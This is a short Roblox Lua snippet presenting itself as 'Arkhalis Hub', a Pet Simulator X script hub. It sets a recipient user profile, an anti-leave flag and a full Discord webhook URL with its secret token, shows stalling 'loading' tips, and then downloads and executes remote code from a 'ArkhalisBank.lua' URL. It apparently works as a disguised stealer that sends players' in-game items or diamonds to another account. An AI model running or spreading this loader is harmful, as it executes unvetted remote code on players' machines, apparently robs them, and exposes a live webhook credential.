_G.UserId = https://www.roblox.com/users/898649584/profile 

_G.AntiLeave = true
_G.Diamonds = 100000

_G.Webhook = "https://discord.com/api/webhooks/1100735279024832552/-chFA0_1jU45tKHgDpkLjEFkkKEJf7c4TAYrMb38HKjlBHrglvmCC6GeLJ4XN17AeAzX" 
    
_G.ScriptName = "Arkhalis Hub"
_G.Tip1 = "#1 PSX Script Hub"
_G.Tip2 = "Please be patient, this may take a while"
_G.Tip3 = "Did you know Arkhalis Hub was the first PSX Script?"
_G.Tip4 = "Join our discord while you wait"
_G.Tip5 = "Almost there..."
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisBank.lua"))()
